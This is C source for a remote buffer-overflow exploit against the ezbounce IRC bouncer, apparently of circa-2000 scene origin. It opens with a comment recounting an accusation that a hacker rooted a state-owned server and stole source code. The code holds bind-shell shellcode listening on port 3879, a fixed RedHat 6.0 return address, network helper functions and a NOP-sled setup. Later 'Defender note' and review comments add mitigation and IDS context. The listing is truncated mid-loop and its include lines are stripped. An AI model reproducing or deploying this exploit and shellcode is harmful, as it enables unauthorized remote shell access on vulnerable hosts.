/* ezbounce version (0.85.2 and probably others) exploit by sectorx
 * mad thanks to duke for helping me with the segment probe code :)
 * I included the offset of RedHat 6.0's RPM, feel free to report any
 * other offsets of precompiled binaries to me.
 *
 * PRIVATE! DO NOT DISTRIBUTE!!
 *
 * ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 * This source code was supposed to be PRIVATE PROPERTY of XOR,
 * though it was made public, WITHOUT OUR PERMISSION, by gov-boi,
 * the owner of hack.co.za. This once again proves Phonic's claims
 * about gov-boi.
 *
 *
 * "The Source Code Thief Revealed" --Phonic :
 * ------------------------------------------
 *
 * Welcome to the new www.hack.co.za
 *
 * My name is phonic. You might have heard of me.
 *
 * Part I
 * ----------
 * You might have noticed that recently a file was added called the Cisco
 * Auditing Tool. This tool was a pretty nice all-in-one Cisco Router tool
 * coded by g0ne. I was helping him work on this tool, and I happened to
 * have a local copy of it on the machine I admin: Station 25. I might also
 * add that this is a state owned box. Well, as we were working on this tool,
 * we were getting it ready for release. Working out a few bugs, adding some
 * new tools, etc. So I had the latest version of the source in a private
 * directory on my box. Also, I had a large collection of un-released source
 * code.
 *
 * Part II
 * ----------
 * About a month or so ago, I was asked by a friend, whose name will remain
 * confidential, if I would mind hosting www.hack.co.za for gov-boi, aka
 * rage. Apparently, the previous hoster stopped hosting it for reasons
 * unknown to me, so the site was down for a while. I, being the kind and
 * generous person that I am so well known to be =], said ok. So for the past
 * month or so, www.hack.co.za was being hosted here. I helped gov-boi set up
 * the dns tables, etc. so that the site would work and everyone would be
 * happy.
 *
 * Part III
 * ----------
 * Like I said earlier, the pre-release source code for the Cisco Auditing
 * Tool was on this box. On the night of May 25th 2000, I got a phone call
 * from g0ne. Apparently, someone had posted the source code to packet storm.
 * Well, this was strange because only 3 people, myself and g0ne included,
 * had the source. I didn't think anyone on my box would have taken it since
 * I thought they were all trustworthy. It turned out I was sadly mistaken.
 * After careful examination of the box, I learned that gov-boi rooted the
 * box, the box I was generous enough to let him use, with a local exploit.
 * He did not hide his work at all, so this was easily found in the logs.
 *
 * Part IV
 * ----------
 * gov-boi decided that in exchange for the generosity that I extended
 * towards him, with nothing asked for in return, he was going to go behind
 * my back, and steal tons of source code for his web site. I imagine he is
 * going to quickly change the dns tables to unlink this server from
 * www.hack.co.za once he realizes that I found out that he is a source code
 * thief. Now, in my humble opinion, and I could be wrong, I think this is
 * really fucked up.
 *
 * Part V
 * ----------
 * Finally, tomorrow I have to file a report about the intrusion and hack on this system by gov-boi.
 * Oh, did I mention that this is a state owned box?
 *
 * Thank you for your time.
 * -phonic
 *
 * --snip snip--
 *
 * Thanks for your time.
* --sectorx */

/* NOTE(review): the header names after each #include are missing in this copy
 * (angle-bracket text appears to have been stripped in extraction), so the
 * listing does not compile as shown. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* MAX: size of the scratch buffers in sprint() and Get(). */
#define MAX 4096
/* TIMEOUT: seconds Get() lets Datawatch() wait for readable data. */
#define TIMEOUT 1
/* SIZE: size of the request buffer declared in main(). */
#define SIZE 400
/* TOP: starting index (TOP+2) of the loop at the end of the visible part of
 * main(); the rest of its use is not on this page. */
#define TOP 310
/* Defender note: a single hard-coded stack address, valid per the author's
 * comment for one specific prebuilt binary. Depending on a fixed stack
 * address presumes a non-randomized, executable stack; ASLR and a
 * non-executable stack are the platform mitigations for this class of
 * attack. */
#define ADDR 0xbffff26c /* ezbounce 0.85.2 RedHat 6.0 RPM offset */

/* bind a shell on port 3879 by lamagra */
/* Defender note: per the author's comment above, this payload opens a
 * listening shell on TCP port 3879. An unexpected listener on that port on a
 * host running ezbounce, or a shell spawned as a child of the ezbounce
 * process, is an indicator worth alerting on. The array is x86 Linux machine
 * code (it ends in the literal "/bin/sh"). */
char shellcode[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

/*
 * Connect - open a TCP connection to ip:port.
 *
 * ip is stored into s_addr unconverted, so it is presumably already in
 * network byte order (confirm against the caller, which is not visible);
 * port is converted with htons().
 *
 * Returns the connected socket descriptor, or -1 on failure.
 *
 * NOTE(review): `a` is not zero-initialized, so its padding bytes are
 * indeterminate, and the socket is not closed when connect() fails, which
 * leaks the descriptor.
 */
int Connect(int ip, int port)
{
	int fd;
	struct sockaddr_in a;

	fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if (fd<0) return -1;

	a.sin_family = AF_INET;
	a.sin_port = htons(port);
	a.sin_addr.s_addr = ip;

	if (connect(fd,(struct sockaddr*)&a,sizeof(struct sockaddr))<0) return -1;
	return fd;
}

/*
 * sprint - printf-style send: format into a MAX-byte buffer, echo the text to
 * stdout prefixed with "-> ", then write it to fd.
 *
 * vsnprintf() bounds the formatted text to MAX bytes, so longer output is
 * truncated. Returns whatever write() returns.
 *
 * NOTE(review): va_start() is never paired with va_end().
 */
int sprint(int fd, const char *str, ...)
{
	va_list args;
	char buf[MAX];

	va_start(args,str);
	vsnprintf(buf,MAX,str,args);
	printf("-> %s",buf);
	return(write(fd,buf,strlen(buf)));
}

/*
 * Datawatch - wait up to `sec` seconds for fd to become readable.
 *
 * Returns 1 when select() returns non-zero, 0 on timeout.
 *
 * NOTE(review): select() returns -1 on error, which is also non-zero, so an
 * error is reported to the caller as "data available".
 */
int Datawatch(int fd, int sec)
{
	fd_set fds;
	struct timeval tv;

	tv.tv_sec = sec;
	tv.tv_usec = 0;
	FD_ZERO(&fds);
	FD_SET(fd,&fds);

	if (select(fd+1,&fds,NULL,NULL,&tv)) return 1;
	return 0;
}

/*
 * Get - drain fd while data keeps arriving and count how many of the reads
 * contain the substring `grep`.
 *
 * Loops as long as Datawatch() reports data within TIMEOUT seconds and
 * returns the number of matching reads.
 *
 * NOTE(review): the result of read() is ignored, so EOF or an error is not
 * told apart from data. The buffer is zeroed before each read, but a read
 * that fills all MAX bytes leaves no terminator for strstr().
 */
int Get(int fd, char *grep)
{
	char buf[MAX];
	int ret=0;

	while (Datawatch(fd,TIMEOUT)>0)
	{
		memset(&buf,0,sizeof(buf));
		read(fd,&buf,sizeof(buf));
		if (strstr(buf,grep)) ++ret;
	}
	return ret;
}

/*
 * main - entry point; prints a banner and expects at least five command-line
 * arguments (argc < 6 prints the usage line and returns).
 *
 * NOTE(review): the argument names in the usage string appear to have been
 * lost in extraction, and the bare `return;` gives an int function no return
 * value. The listing breaks off mid-statement at the end of this block; the
 * rest of main is not on this page.
 */
int main(int argc, char *argv[])
{
	int i,fd;
	char buf[SIZE];

	printf("ezbounce remote exploit by sectorx of xor\n");
	if (argc<6)
	{
		printf("Usage: %s \n\n",argv[0]);
		return;
	}

	/* 0x90 is the x86 NOP opcode; the whole buffer is pre-filled with it.
	 * Defender note: long runs of 0x90 in traffic sent to the service are a
	 * classic signature that network IDS rules match on. */
	memset(&buf,0x90,sizeof(buf));
	for (i=TOP+2;i